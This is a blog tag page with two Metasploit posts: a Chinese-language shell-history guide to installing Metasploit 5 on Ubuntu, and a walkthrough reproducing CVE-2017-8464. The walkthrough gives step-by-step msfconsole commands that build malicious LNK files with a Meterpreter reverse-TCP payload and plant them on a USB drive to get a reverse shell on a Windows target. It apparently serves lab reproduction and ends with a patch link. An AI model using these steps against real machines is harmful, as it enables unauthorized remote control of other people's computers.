Tag:metasploit

Tag (metasploit)'s result:

ubuntu14 or 16.04安装MSF5

20200719 updated ubuntu 16.04安装msf5 注意: 1.尽量用非root的sudo用户,否则可能会出现非root无法用root安装的bundler install依赖 2.第一次执行msfconsole先退出ssh //或者在msf目录执行msfconsole否则可能提示缺少依赖,要安装166个gem install依赖……   34  apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev zlib1g-dev   apt-get install software-properties-common python-software-properties 29  add-apt-repository ppa:openjdk-r/ppa   apt-get update 32  apt-get install openjdk-7-jdk   37  git clone git://github.com/sstephenson/rbenv.git .rbenv 38  cd 39  echo ‘export PATH=”$HOME/.rbenv/bin:$PATH”‘ >> ~/.bashrc 40  echo ‘eval “$(rbenv init -)”‘ >> ~/.bashrc 41  git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build 42  echo ‘export PATH=”$HOME/.rbenv/plugins/ruby-build/bin:$PATH”‘ >> ~/.bashrc 43  git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo   45  source .bashrc   49  apt-get install nmap 50  apt-get install openssl ruby-openssl libssl-dev 51  apt-get install openssl libssl-dev   52  su postgres createuser msf -P -S -R -D 3  cd 4  createdb -O msf msf exit   53  cd /opt 54  ls 55  git clone https://github.com/rapid7/metasploit-framework.git 56  cd metasploit-framework/ 57  ls   65  curl -L get.rvm.io | bash -s stable 66  ls 67  cd 68  gpg –keyserver hkp://pool.sks-keyservers.net –recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB 69  curl -L get.rvm.io | bash -s stable 70  rvm -v……

stuxnet repeat(cve-2017-8464)

0x01 Overview In June 2017,Microsoft posted a patch for cve-2017-8464,this bug allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. aka “LNK Remote Code Execution Vulnerability.”. It like stuxnet,so some people call it the three generations of stuxnet.In this article,I will repeat cve-2017-8464. 0x02 The effects of range Windows 7 SP1 Windows 8 Windows 8.1 Windows RT 8.1 Windows 10 Gold, 1511, 1607, 1703 Windows Server 2008 SP2 and R2 SP1 Windows Server 2012 Gold and R2 Windows Server 2016 0x03 Trigger conditions 1.Open automatically play(It worked!) 2.Browse the catalog(It worked! 3.Access the file directory through a network share(I did not test this) 0x04 Bug repeat Environment: Drone: win7(32bit) Attacker: kali Tools: MSF,u disk Step 1: Download the last metasploit,then copy modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb to /usr/share/metasploit-framework/modules/exploits/windows/fileformat. And copy data/exploits/cve-2017-8464 to /usr/share/metasploit-framework/data/exploits. Step 2: msfconsole use exploit/windows/fileformat/cve_2017_8464_lnk_rce set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your ip exploit Step 3: cp /root/.msf4/local/ /root/cve-2017-8464-lnk Step 4: cp the all 24 files to the root folder of the target USB drive Step 5: use multi/handler set paylaod windows/meterpreter/reverse_tcp set LHOST your ip run Step 6: insert your usb to target computer,then you will get a reverse shell. PS: the .cpl file must in  the root folder of the target USB drive! 0x05 Repair Get the patch from MS: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8464 0x06 Conclusion I think this bug is so cool,it like stuxnet,powful and easy to use,so get the patch as fast as possible. 0x07 Reference 1.https://cve.mitre.org/data/downloads/allitems-cvrf-year-2017.xml 2.http://www.4hou.com/system/6938.html 3.http://www.freebuf.com/news/143356.html